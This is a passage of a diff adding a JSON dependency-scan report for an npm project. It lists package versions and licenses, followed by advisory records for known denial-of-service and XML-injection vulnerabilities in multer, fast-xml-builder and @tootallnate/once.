"Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "isexe@2.0.0" + ], + "Locations": [ + { + "StartLine": 10470, + "EndLine": 10484 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "which-module@2.0.1", + "Name": "which-module", + "Identifier": { + "PURL": "pkg:npm/which-module@2.0.1", + "UID": "e3353609be4de2d6" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10485, + "EndLine": 10490 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrap-ansi@6.2.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@6.2.0", + "UID": "a32f9d6e25e3b027" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 8233, + "EndLine": 8246 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrap-ansi@7.0.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@7.0.0", + "UID": "8bee6fdcb9058cee" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 10518, + "EndLine": 10535 + }, + { + "StartLine": 10536, + "EndLine": 10553 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrap-ansi@8.1.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@8.1.0", + "UID": "f65553ce27261dcd" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@6.2.3", + "string-width@5.1.2", + "strip-ansi@7.2.0" + ], + "Locations": [ + { + "StartLine": 1497, + "EndLine": 1513 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "wrappy@1.0.2", + "Name": "wrappy", + "Identifier": { + "PURL": "pkg:npm/wrappy@1.0.2", + "UID": "798a66a5ecf49027" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10554, + "EndLine": 10560 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ws@8.18.3", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@8.18.3", + "UID": "f8dc386179443300" + }, + "Version": "8.18.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10561, + "EndLine": 10581 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xmlbuilder@13.0.2", + "Name": "xmlbuilder", + "Identifier": { + "PURL": "pkg:npm/xmlbuilder@13.0.2", + "UID": "fcded8a61f796d2d" + }, + "Version": "13.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10582, + "EndLine": 10590 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xmlhttprequest-ssl@2.1.2", + "Name": "xmlhttprequest-ssl", + "Identifier": { + "PURL": "pkg:npm/xmlhttprequest-ssl@2.1.2", + "UID": "ee30c9dc7641a72" + }, + "Version": "2.1.2", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10591, + "EndLine": 10598 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "xtend@4.0.2", + "Name": "xtend", + "Identifier": { + "PURL": "pkg:npm/xtend@4.0.2", + "UID": "adaf491d0010f9bd" + }, + "Version": "4.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10599, + "EndLine": 10607 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "y18n@4.0.3", + "Name": "y18n", + "Identifier": { + "PURL": "pkg:npm/y18n@4.0.3", + "UID": "35cf4c607c271c7c" + }, + "Version": "4.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8247, + "EndLine": 8252 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "y18n@5.0.8", + "Name": "y18n", + "Identifier": { + "PURL": "pkg:npm/y18n@5.0.8", + "UID": "29516b1a4ca967b0" + }, + "Version": "5.0.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10608, + "EndLine": 10617 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "a4eeca57182b7d99" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10618, + "EndLine": 10623 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs@15.4.1", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@15.4.1", + "UID": "22cd352b04d758a7" + }, + "Version": "15.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@6.0.0", + "decamelize@1.2.0", + "find-up@4.1.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "require-main-filename@2.0.0", + "set-blocking@2.0.0", + "string-width@4.2.3", + "which-module@2.0.1", + "y18n@4.0.3", + "yargs-parser@18.1.3" + ], + "Locations": [ + { + "StartLine": 8253, + "EndLine": 8274 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs@17.7.2", + "Name": "yargs", + "Identifier": { + "PURL": "pkg:npm/yargs@17.7.2", + "UID": "b8c272e1f872b012" + }, + "Version": "17.7.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cliui@8.0.1", + "escalade@3.2.0", + "get-caller-file@2.0.5", + "require-directory@2.1.1", + "string-width@4.2.3", + "y18n@5.0.8", + "yargs-parser@21.1.1" + ], + "Locations": [ + { + "StartLine": 10624, + "EndLine": 10642 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs-parser@18.1.3", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@18.1.3", + "UID": "ecc16404dd3eeba6" + }, + "Version": "18.1.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase@5.3.1", + "decamelize@1.2.0" + ], + "Locations": [ + { + "StartLine": 8275, + "EndLine": 8287 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yargs-parser@21.1.1", + "Name": "yargs-parser", + "Identifier": { + "PURL": "pkg:npm/yargs-parser@21.1.1", + "UID": "6f7dba94058c5219" + }, + "Version": "21.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10643, + "EndLine": 10652 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yocto-queue@0.1.0", + "Name": "yocto-queue", + "Identifier": { + "PURL": "pkg:npm/yocto-queue@0.1.0", + "UID": "93e5e9e74f78ff9b" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10663, + "EndLine": 10675 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "yoga-layout@2.0.1", + "Name": "yoga-layout", + "Identifier": { + "PURL": "pkg:npm/yoga-layout@2.0.1", + "UID": "fbab78ef81b1ea22" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10676, + "EndLine": 10681 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "zod@3.25.76", + "Name": "zod", + "Identifier": { + "PURL": "pkg:npm/zod@3.25.76", + "UID": "c3a2a28a4229a952" + }, + "Version": "3.25.76", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10682, + "EndLine": 10690 + } + ], + "AnalyzedBy": "npm" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2026-3449", + "VendorIDs": [ + "GHSA-vpq2-c234-7xj6" + ], + "PkgID": "@tootallnate/once@2.0.0", + "PkgName": "@tootallnate/once", + "PkgIdentifier": { + "PURL": "pkg:npm/%40tootallnate/once@2.0.0", + "UID": "22f57853d23edc3a" + }, + "InstalledVersion": "2.0.0", + "FixedVersion": "3.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109", + "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", + "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", + "Severity": "LOW", + "CweIDs": [ + "CWE-705" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", + "V3Score": 3.3, + "V40Score": 1.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3449", + "https://github.com/TooTallNate/once", + "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", + "https://github.com/TooTallNate/once/issues/8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", + "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", + "https://www.cve.org/CVERecord?id=CVE-2026-3449" + ], + "PublishedDate": "2026-03-03T05:17:25.017Z", + "LastModifiedDate": "2026-05-19T15:38:48.397Z" + }, + { + "VulnerabilityID": "CVE-2026-44665", + "VendorIDs": [ + "GHSA-5wm8-gmm8-39j9" + ], + "PkgID": "fast-xml-builder@1.1.5", + "PkgName": "fast-xml-builder", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-builder@1.1.5", + "UID": "e589910a79395ad7" + }, + "InstalledVersion": "1.1.5", + "FixedVersion": "1.1.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44665", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763", + "Title": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", + "Description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-91" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V3Score": 6.1, + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-44665", + "https://github.com/NaturalIntelligence/fast-xml-builder", + "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44665", + "https://www.cve.org/CVERecord?id=CVE-2026-44665" + ], + "PublishedDate": "2026-05-13T16:16:59.093Z", + "LastModifiedDate": "2026-05-18T16:16:31.7Z" + }, + { + "VulnerabilityID": "CVE-2026-44664", + "VendorIDs": [ + "GHSA-45c6-75p6-83cc" + ], + "PkgID": "fast-xml-builder@1.1.5", + "PkgName": "fast-xml-builder", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-builder@1.1.5", + "UID": "e589910a79395ad7" + }, + "InstalledVersion": "1.1.5", + "FixedVersion": "1.1.6", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44664", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80", + "Title": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", + "Description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., ---\u003e...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-91" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-44664", + "https://github.com/NaturalIntelligence/fast-xml-builder", + "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44664", + "https://www.cve.org/CVERecord?id=CVE-2026-44664" + ], + "PublishedDate": "2026-05-13T16:16:58.937Z", + "LastModifiedDate": "2026-05-13T16:58:09.717Z" + }, + { + "VulnerabilityID": "CVE-2025-47935", + "VendorIDs": [ + "GHSA-44fp-w29j-9vj5" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47935", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b", + "Title": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-401" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", + "https://github.com/expressjs/multer/pull/1120", + "https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5", + "https://nvd.nist.gov/vuln/detail/CVE-2025-47935" + ], + "PublishedDate": "2025-05-19T20:15:25.863Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2025-47944", + "VendorIDs": [ + "GHSA-4pg4-qvpc-4q3h" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47944", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598", + "Title": "Multer vulnerable to Denial of Service from maliciously crafted requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", + "https://github.com/expressjs/multer/issues/1176", + "https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h", + "https://nvd.nist.gov/vuln/detail/CVE-2025-47944" + ], + "PublishedDate": "2025-05-19T20:15:26.007Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2025-48997", + "VendorIDs": [ + "GHSA-g5hg-p3ph-g8qg" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48997", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac", + "Title": "multer: Multer vulnerable to Denial of Service via unhandled exception", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-48997", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9", + "https://github.com/expressjs/multer/issues/1233", + "https://github.com/expressjs/multer/pull/1256", + "https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg", + "https://nvd.nist.gov/vuln/detail/CVE-2025-48997", + "https://www.cve.org/CVERecord?id=CVE-2025-48997" + ], + "PublishedDate": "2025-06-03T19:15:39.577Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2025-7338", + "VendorIDs": [ + "GHSA-fjgf-rc76-4x9p" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-7338", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782", + "Title": "multer: Multer Denial of Service", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-7338", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b", + "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p", + "https://nvd.nist.gov/vuln/detail/CVE-2025-7338", + "https://www.cve.org/CVERecord?id=CVE-2025-7338" + ], + "PublishedDate": "2025-07-17T16:15:35.227Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2026-2359", + "VendorIDs": [ + "GHSA-v52c-386h-88mc" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2359", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd", + "Title": "multer: Multer: Denial of Service via dropped file upload connections", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-772" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2359", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab", + "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2359", + "https://www.cve.org/CVERecord?id=CVE-2026-2359" + ], + "PublishedDate": "2026-02-27T16:16:25.467Z", + "LastModifiedDate": "2026-03-19T17:28:16.05Z" + }, + { + "VulnerabilityID": "CVE-2026-3304", + "VendorIDs": [ + "GHSA-xf7r-hgr6-v32p" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3304", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712", + "Title": "multer: Multer: Denial of Service via malformed requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-459" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3304", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee", + "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3304", + "https://www.cve.org/CVERecord?id=CVE-2026-3304" + ], + "PublishedDate": "2026-02-27T16:16:26.38Z", + "LastModifiedDate": "2026-03-19T17:28:33.81Z" + }, + { + "VulnerabilityID": "CVE-2026-3520", + "VendorIDs": [ + "GHSA-5528-5vmv-3xc2" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3520", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530", + "Title": "multer: Multer: Denial of Service via malformed requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": 